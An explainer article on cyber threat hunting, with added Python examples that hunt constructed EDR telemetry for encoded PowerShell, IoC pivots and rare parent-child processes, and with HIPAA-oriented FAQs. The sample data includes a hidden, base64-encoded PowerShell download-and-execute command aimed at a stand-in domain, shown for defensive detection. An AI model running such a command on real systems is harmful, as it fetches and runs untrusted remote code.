According to IBM, “Threat hunting, also known as cyberthreat hunting, is a proactive approach to identifying previously unknown, or ongoing non-remediated threats, within an organization's network.”
Understanding threat hunting
Threat hunting is important in cybersecurity because automated tools can’t catch every threat. While these tools and security teams handle most issues, about 20% of threats are more advanced and can slip through, often staying hidden for nearly 280 days. These lingering threats can lead to data exposure and, on average, cost companies close to 4 million dollars, with long-term impacts. By hunting for these threats, organizations can catch attacks faster, minimizing damage and costs tied to prolonged breaches.
Kunle Fadeyi, Founder of Yieldvestor and tappengine, explains how AI has changed the game: “AI has revolutionized the way we protect systems, networks, and devices. Today, it acts as an essential ally, offering incredible opportunities to detect and destroy threats rapidly before they cause problems.” Kunle further highlights the benefits of AI in threat hunting, noting that “Machine learning offers rapid threat detection through two main channels: automated threat detection and response and operations led by experts. AI systems can detect patterns that may not appear on a human radar, enabling businesses and individuals to get a head start on hackers.”
Through Kunle’s perspective, we see how AI strengthens cybersecurity by analyzing data swiftly and precisely, giving organizations an advantage in spotting threats before they escalate.
The threat hunting process
Effective threat hunting is built upon a foundation of data collection and analysis. Before any hunt begins, security teams must have their enterprise security tooling in place and already gathering and consolidating telemetry from across the environment: endpoint process and network events from EDR, authentication and directory logs, DNS and proxy logs, and cloud audit trails, typically centralised in a SIEM. That data is the bedrock of the hunting process, providing the clues and context hunters work from, and it sets the limit of what a hunt can find: an unmonitored network segment or logs retained for only a few days are gaps in what can be hunted.
Structured hunting
Structured hunting is a methodical approach that begins with a hypothesis based on indicators of attack (IoAs) and the tactics, techniques, and procedures (TTPs) of known threat actors. By mapping each hypothesis to a technique in the MITRE ATT&CK framework, hunters search for the behaviour itself rather than for a specific file hash or address, which is harder for an attacker to change. Where the observed TTPs match a documented group's playbook, this can also narrow down the likely threat actor, sometimes before the attacker reaches their objective.
Unstructured hunting
In contrast, unstructured hunting starts from a trigger, most often an indicator of compromise (IoC) such as a malicious domain, IP address or file hash that has appeared in the environment. The hunter pivots outward from that trigger through the available data, examining what happened on the affected hosts before and after the detection and which other hosts touched the same indicator, to uncover activity that the original alert did not cover.
Situational or entity-driven hunting
Situational or entity-driven hunting is guided by an organization's internal risk assessment, or by an analysis of the trends and vulnerabilities specific to its IT environment, and focuses the hunt on the entities that matter most: the users, hosts and applications with access to its most sensitive data. Threat hunters can also draw on crowd-sourced attack data to identify the latest TTPs and search for those specific behaviours within their own network.
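The three approaches above, as an added example that is not part of the original article: a structured hunt for base64-encoded PowerShell (the ATT&CK technique T1059.001 hypothesis), an unstructured pivot from a single IoC domain to every host that resolved it and the events around that time, and an optional host filter that scopes either hunt to chosen entities. The telemetry is constructed inline; the event field names (`ts`, `host`, `event`, `image`, `parent`, `cmdline`, `domain`, `dest`) are an assumed generic EDR schema, and the hostnames, domain and payload are invented for the example.

```python
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry (not real data). Field names follow a generic
# EDR-style schema and are an assumption of this example. The encoded command
# is built at runtime so the base64 is guaranteed to be well-formed.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://update-cdn.example/a')"
_ENC = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode()

EVENTS = [
    {"ts": "2024-03-04T08:50:00", "host": "ws-12", "event": "process", "parent": "outlook.exe",
     "image": "winword.exe", "cmdline": 'winword.exe /n "C:\\Users\\j\\Downloads\\invoice.docm"'},
    {"ts": "2024-03-04T09:01:00", "host": "ws-07", "event": "process", "parent": "explorer.exe",
     "image": "powershell.exe", "cmdline": "powershell.exe -File C:\\scripts\\inventory.ps1"},
    {"ts": "2024-03-04T09:15:00", "host": "ws-12", "event": "process", "parent": "winword.exe",
     "image": "powershell.exe", "cmdline": f"powershell.exe -nop -w hidden -enc {_ENC}"},
    {"ts": "2024-03-04T09:15:20", "host": "ws-12", "event": "dns", "image": "powershell.exe",
     "domain": "update-cdn.example"},
    {"ts": "2024-03-04T09:16:00", "host": "ws-12", "event": "network", "image": "powershell.exe",
     "dest": "203.0.113.10:443"},
    {"ts": "2024-03-04T10:03:00", "host": "ws-19", "event": "process", "parent": "wscript.exe",
     "image": "rundll32.exe", "cmdline": "rundll32.exe C:\\Users\\Public\\up.dll,Start"},
    {"ts": "2024-03-04T10:05:00", "host": "ws-19", "event": "dns", "image": "rundll32.exe",
     "domain": "update-cdn.example"},
    {"ts": "2024-03-04T12:00:00", "host": "ws-07", "event": "dns", "image": "chrome.exe",
     "domain": "www.example.com"},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the regex
# covers the full name and the abbreviations seen most often in practice.
_ENC_FLAG = re.compile(r"(?i)(?<!\S)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
_OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def hunt_encoded_powershell(events, hosts=None):
    """Structured hunt. Hypothesis: an attacker runs base64-encoded PowerShell
    (ATT&CK T1059.001). `hosts` optionally scopes the hunt to chosen entities."""
    findings = []
    for ev in events:
        if ev["event"] != "process" or ev["image"].lower() != "powershell.exe":
            continue
        if hosts and ev["host"] not in hosts:
            continue
        m = _ENC_FLAG.search(ev["cmdline"])
        if not m:
            continue
        try:  # -EncodedCommand is base64 of UTF-16LE text
            decoded = base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
        except ValueError:
            decoded = "<not valid base64>"
        findings.append({
            "host": ev["host"], "ts": ev["ts"], "parent": ev["parent"],
            "decoded": decoded,
            "suspicious_parent": ev["parent"].lower() in _OFFICE,  # Office spawning a shell
        })
    return findings


def pivot_on_ioc(events, domain, window_minutes=30):
    """Unstructured hunt. Start from one IoC (a C2 domain), find every host that
    resolved it, then pull that host's activity within +/- window of each hit."""
    hits = [(datetime.fromisoformat(e["ts"]), e["host"])
            for e in events if e["event"] == "dns" and e.get("domain") == domain]
    window = timedelta(minutes=window_minutes)
    timeline = defaultdict(list)
    for when, host in hits:
        for ev in events:
            if ev["host"] != host:
                continue
            t = datetime.fromisoformat(ev["ts"])
            if when - window <= t <= when + window and ev not in timeline[host]:
                timeline[host].append(ev)
    for host in timeline:
        timeline[host].sort(key=lambda e: e["ts"])
    return dict(timeline)


if __name__ == "__main__":
    for f in hunt_encoded_powershell(EVENTS):
        print(f"[T1059.001] {f['host']} {f['ts']} parent={f['parent']} -> {f['decoded']}")
    for host, evs in pivot_on_ioc(EVENTS, "update-cdn.example").items():
        print(f"[IoC pivot] {host}: {len(evs)} events, first {evs[0]['ts']} {evs[0]['image']}")
```

The structured hunt flags only the Word-spawned encoded command, not the scheduled inventory script, because it keys on the technique (an encoded command line) and then adds the parent process as context for triage. The IoC pivot finds a second host, ws-19, that resolved the same domain from rundll32.exe without any alert having fired on it, which is exactly the pre- and post-detection coverage that makes the unstructured approach worthwhile.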
Threat hunting models
Threat hunting can be categorized into three primary models: intel-based hunting, hypothesis-based hunting, and custom hunting.
Intel-based hunting
Intel-based hunting is a reactive model driven by IoCs (file hashes, IP addresses, domain names) from threat intelligence sources. When an indicator matches in the environment, hunters investigate the activity before and after the match to determine whether, and how far, the environment was compromised. The caveat is that IoCs are only as current as the feed that supplies them, and an attacker can change infrastructure and file hashes far more easily than behaviour.
Hypothesis-based hunting
Hypothesis-based hunting is a proactive model that aligns with the MITRE ATT&CK framework. Threat hunters create hypotheses based on the IoAs and TTPs of known threat actors, allowing them to proactively detect and isolate threats before they can cause damage.
Custom hunting
Custom or situational hunting is tailored to an organization's specific requirements and industry-based methodologies. It looks for anomalies in the data already held by security information and event management (SIEM) and endpoint detection and response (EDR) tools, for example a parent-child process relationship that appears on only one host, or one that was never seen in a baseline period, and draws on both intel-based and hypothesis-based approaches.
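Anomaly hunting in EDR data, as an added example that is not part of the original article: least-frequency analysis ("stacking") of parent-child process pairs, which surfaces the pairs seen on very few hosts, and a baseline comparison that surfaces pairs never seen in an earlier window. The records are constructed inline as (host, parent, child) tuples; that layout, the hostnames and the accepted-pairs list are assumptions of this example, not a real product schema.

```python
from collections import defaultdict

# Constructed sample EDR process-creation records: (host, parent, child).
# Twenty workstations share the same routine parent->child pairs; three
# extra records in the current window are what a hunter is looking for.
ROUTINE = [("explorer.exe", "outlook.exe"), ("explorer.exe", "chrome.exe"),
           ("services.exe", "svchost.exe"), ("explorer.exe", "winword.exe")]
BASELINE = [(f"ws-{i:02d}", p, c) for i in range(1, 21) for p, c in ROUTINE]
CURRENT = BASELINE + [
    ("ws-12", "winword.exe", "cmd.exe"),   # document macro spawning a shell
    ("srv-02", "w3wp.exe", "cmd.exe"),     # IIS worker spawning a shell (webshell pattern)
    ("ws-03", "explorer.exe", "cmd.exe"),  # a developer opening a terminal: rare but expected
]
# Pairs the hunt team has already triaged and accepted for this environment
# (assumed tuning data; every environment needs its own list).
ACCEPTED = {("explorer.exe", "cmd.exe")}


def stack_parent_child(events, max_hosts=1, accepted=ACCEPTED):
    """Least-frequency analysis ('stacking'): count the distinct hosts on which each
    parent->child pair occurs and return the pairs seen on at most `max_hosts` hosts,
    each with the hosts involved, so the hunter can pivot straight to them."""
    hosts_per_pair = defaultdict(set)
    for host, parent, child in events:
        hosts_per_pair[(parent.lower(), child.lower())].add(host)
    return sorted(
        (pair, sorted(hosts)) for pair, hosts in hosts_per_pair.items()
        if len(hosts) <= max_hosts and pair not in accepted
    )


def new_since_baseline(baseline, current, accepted=ACCEPTED):
    """Pairs present in the current window that never occurred in the baseline window.
    Catches activity that is new even if it is not rare within the current window."""
    seen = {(p.lower(), c.lower()) for _, p, c in baseline}
    now = {(p.lower(), c.lower()) for _, p, c in current}
    return sorted(now - seen - accepted)


if __name__ == "__main__":
    for pair, hosts in stack_parent_child(CURRENT):
        print(f"rare: {pair[0]} -> {pair[1]} on {hosts}")
    for pair in new_since_baseline(BASELINE, CURRENT):
        print(f"new since baseline: {pair[0]} -> {pair[1]}")
```

Both routines are deliberately environment-specific: the `max_hosts` threshold, the baseline window and the accepted list are the tuning that distinguishes a custom hunt from a generic rule, and the accepted list should be reviewed rather than grown indefinitely, since an attacker who lands on a developer workstation benefits from every pair it suppresses.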
Threat hunting tools
Threat hunters use a variety of tools to enhance their investigative capabilities. These include managed detection and response (MDR) solutions, SIEM platforms, and advanced security analytics tools. By integrating these tools and ensuring the availability of data sources, threat hunters can access the necessary information to guide their investigations and uncover even the most elusive threats.
Threat hunting vs. threat intelligence
While threat intelligence and threat hunting are closely related, they serve distinct purposes. Threat intelligence is the collection and analysis of data about attempted or successful intrusions, much of it gathered and processed by automated security systems, describing who attacks, how they operate, and which indicators they leave behind. Threat hunting, on the other hand, uses that intelligence as a starting point for a deliberate, environment-wide search for adversaries, and often finds activity that no existing alert or signature has flagged.
Related: What is threat intelligence?
FAQs
What is threat hunting in healthcare, and how does it relate to HIPAA compliance?
Threat hunting is a proactive cybersecurity practice that involves actively searching for signs of malicious activity within an organization's network and systems. In healthcare, threat hunting can identify threats to electronic protected health information (ePHI) that evade traditional security measures. It supports HIPAA compliance by finding active intrusions and exploitable weaknesses before they become reportable breaches or violations of patient privacy, and it gives substance to the Security Rule's expectation that covered entities regularly review information system activity such as audit logs, access reports and security incident tracking.
What are the potential risks of not implementing threat hunting in healthcare under HIPAA?
- Delayed threat detection: Without proactive threat hunting, malicious activities may go unnoticed until they cause damage or result in a data breach.
- Increased likelihood of data breaches: The absence of threat hunting can lead to undetected vulnerabilities and unauthorized access to ePHI, compromising patient privacy and HIPAA compliance.
- Regulatory penalties: Failure to detect and respond to threats may result in violations of HIPAA’s security and privacy rules, leading to substantial legal and financial penalties.
- Operational disruptions: Undetected threats can disrupt healthcare operations, affecting patient care and the availability of medical records.
- Reputational damage: Data breaches or security incidents resulting from inadequate threat detection can damage the organization’s reputation and erode patient trust.
How can healthcare facilities implement effective threat hunting practices to maintain HIPAA compliance?
- Utilizing advanced threat detection tools: Employing security information and event management (SIEM) systems and other advanced tools to analyze network traffic and identify suspicious activities.
- Building a skilled threat hunting team: Developing a team of cybersecurity experts trained in identifying and mitigating threats specific to healthcare environments.
- Establishing threat hunting protocols: Creating procedures and guidelines for regularly conducting threat hunts, analyzing findings, and responding to potential threats.
- Integrating threat intelligence: Using threat intelligence to stay informed about emerging threats and vulnerabilities relevant to healthcare.
- Continuous monitoring and analysis: Maintaining ongoing monitoring of network activities and system behaviors to detect early signs of malicious activity.
Learn more: HIPAA Compliant Email: The Definitive Guide